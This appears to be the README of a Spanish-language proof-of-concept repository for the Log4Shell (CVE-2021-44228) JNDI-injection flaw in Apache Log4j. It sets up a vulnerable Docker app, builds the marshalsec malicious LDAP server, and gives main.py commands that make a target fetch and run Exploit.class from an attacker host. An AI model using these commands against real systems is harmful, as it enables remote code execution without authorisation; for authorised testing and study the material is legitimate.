Log4Shell CVE-2021-44228 PoC # Log4Shell
(CVE-2021-44228)
# ☠️ Log4Shell PoC (CVE-2021-44228)
Exploit de prueba para la vulnerabilidad crítica **Log4Shell** en Apache Log4j ≤ 2.14.1, que permite ejecución remota de código mediante inyecciones JNDI.
> ⚠️ **Este PoC es solo para fines educativos y pruebas controladas en entornos autorizados.** No lo utilices contra sistemas sin permiso expreso.
---
## Requisitos
- Python 3.x
- Java 8 o superior
- [`marshalsec`](https://github.com/mbechler/marshalsec) (para el servidor LDAP malicioso)
- Servidor HTTP (por ejemplo, `python3 -m http.server`)
- Docker (opcional para entorno vulnerable)
---
## Entorno de prueba local (opcional con Docker)
1. Ejecuta la app vulnerable:
```bash
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
```
2. Accede a: http://localhost:8080
```bash
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
```
---
## Uso
### Modo detección pasiva:
```bash
python3 main.py -u http://target.com -i burp.collab.net -m detect
```
### Modo intrusivo (requiere Exploit.class en tu HTTP):
```bash
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit
```
---
[4.0K] /data/pocs/0acbedaaeaeef281c52f0713e86a6fe1dd823c22
├── [ 288] Exploit.java
├── [3.2K] main.py
├── [1.2K] README.md
└── [ 17] requirements.txt
0 directories, 4 files